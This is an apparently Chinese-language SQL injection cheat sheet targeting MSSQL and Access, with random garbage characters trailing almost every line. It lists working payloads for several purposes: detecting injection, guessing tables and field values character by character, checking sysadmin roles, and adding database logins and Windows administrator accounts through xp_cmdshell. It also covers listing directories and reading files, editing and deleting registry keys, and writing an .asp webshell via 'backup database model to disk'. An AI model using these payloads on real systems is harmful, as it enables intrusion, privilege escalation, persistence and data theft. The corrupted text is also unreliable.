1.判断是否有注入;and 1=1 ;and 1=2 f78An 8��
2.初步判断是否是mssql ;and user>0 ||hb~%JK6�
QS` PpyBkd
3.注入参数是字符'and [查询条件] and ''=' si��`A:14R
:(!`��/#6H
4.搜索时没过滤参数的'and [查询条件] and '%25'=' %|g�>%D3Z?
]B%�v�+uaW
5.判断数据库系统 _aad=B�rMK
%l}D.���ml
;and (select count(*) from sysobjects)>0 mssql i���m�9G,e
5_�I-�>�-<
;and (select count(*) from msysobjects)>0 access }��z� ���_
��\N!��AXD
{*0<T|<n��
\�?0&0;�5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 %C~�1^9uq�
b\vK�J2�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 wKZ$i�GMbz
}XV+gyG�=@
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ]iN��'x?Fo
�D�coX+8 7
9.(1)猜字段的ascii值(access) n�>+mL"h�s
�JJ}�0gZ �
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 &]e'Kd�X�F
h]+C.Eqnt#
(2)猜字段的ascii值(mssql) Dn�CP
aM4%
�=(NB�%��}
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 N���dtB�1b
ej4W{I�N~:
10.测试权限结构(mssql) ��=vQcYa�
qq)��� rd�
z=rT%lz�6
�b$ve �sJ�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <��tF9V Jq
@ezH�'y-v�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �0�E,8R{e
4�L ;% ��h
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- !c}O�5TI|#
p7veQ`�yNc
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Mr;E<Lj ^K
UR�7�g�`�/
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- *5�vV6�][�
ROg(�U�8
N
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �Mn9dqq~a�
pP*z��q"o�
;and 1=(select IS_MEMBER('db_owner'));-- T&%�ux=�Jt
"�x=��f�=;
y4t7�`-,~�
WM|�� dKF
11.添加mssql和系统的帐户 b�vv�|;�6
$FlW1E� j�
;exec master.dbo.sp_addlogin username;-- @ ��z�s'Y8
;exec master.dbo.sp_password null,username,password;-- �l)Pu2!Ic�
*Ao�R==:ya
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �X%Z�{�K�-
s�m�0x�L�Z
;exec master.dbo.xp_cmdshell 'net user username password LQtj~c>X-|
uJFdbBDS�h
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- w�.H%R�-Be
9z}uc@#D=m
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �OK�{�quM5
9Wnn'T@T�l
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �@x"0�_Q�w
ue4Vc��f��
�M���,/mE~
�� Fy`(BF\
12.(1)遍历目录 MS���\�>DW
E�=e*VE�jy
;create table dirs(paths varchar(100), id int) �8�5n1e��E
@\�|����_
;insert dirs exec master.dbo.xp_dirtree 'c:\' �b��n�^�{c
����@2Z#x�
;and (select top 1 paths from dirs)>0 zaah^�.MA|
�3g�v|9��T
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
�0U�o\wyd
@�!`��Xl*l
2] zq#6i�x
ep2k%?CX 1
(2)遍历目录 x$1]M DAGb
wQ�e_���vY
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- p?B=�1vn-2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 @&X|5�p"[g
ft$RS��b�#
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 /lo�2y?CS*
^�:�#�D0[�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 GH+r��?�2<
f>�W�-��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 S�-�k8j��m
\D�e{�9�v
�b�sB�*533
�V�O�$
iNK
13.mssql中的存储过程 {�5F-5YL+>
TMig�-y*�[
xp_regenumvalues 注册表根键, 子键 m|{3�),#�V
"tB�;^jhRs
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 rd9e \%�A
v�#.��r.{t
xp_regread 根键,子键,键值名 �#7MUJY+
9
1UE6 4Kl:S
;exec xp_regread E�d_N[�I
�
�=>M�^02�"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qWO���D�s
CitDm1DXt/
xp_regwrite 根键,子键, 值名, 值类型, 值 ;~D�)~=|ZZ
M�O��n���
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 K2J��\�awX
`[W[H�(AjQ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 LN@F+C�yDc
�1I�Z�3=6
xp_regdeletevalue 根键,子键,值名 XDFx.)�t��
��f}x.jxY?
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �V+V��kY�3
6f�\Lf?�vF
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Zo �g']��=
;4.!H�,�d
M�z~M3$$9n
w-Da�~[J�
14.mssql的backup创建webshell ~c� %h�W�t
c.���>oe*+
use model 5���u*-L�_
���O�"F_*
create table cmd(str image); @>�W(1mR�i
Hm%;�=`:'�
insert into cmd(str) values (''); �]Bjyi[#bg
{
S3ZeN,kZ
backup database model to disk='c:\l.asp'; I?ae\X@M��
!V�
�i@�1E
F.w�5S�!5Q
|�MF�F7z{%
15.mssql内置函数 �(2:/8�\_P
;#oie<
Vit
;and (select @@version)>0 获得Windows的版本号 �w�*oQ["SL
�<gJ��U?$
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �Il=
W,/y�
�j^^A�p��
;and (select user_name())>0 爆当前系统的连接用户 ]3K�hgK%c8
}��M3fmAP}
;and (select db_name())>0 得到当前连接的数据库 �]>�~)<
��
=
c>�Qx"Sw
Q���4f/�Z
<;���#�~l*
16.简洁的webshell n~A%q,�DmF
1e�&QSz�L�
use model �W!?7��D0q
]y�,==1To
create table cmd(str image); �Y6Lf@}2(i
X&�0 uI*r�
insert into cmd(str) values ('');
?sMP~RHQ�
�\Dd-�Xn_b
backup database model to disk='g:\wwwtest\l.asp';
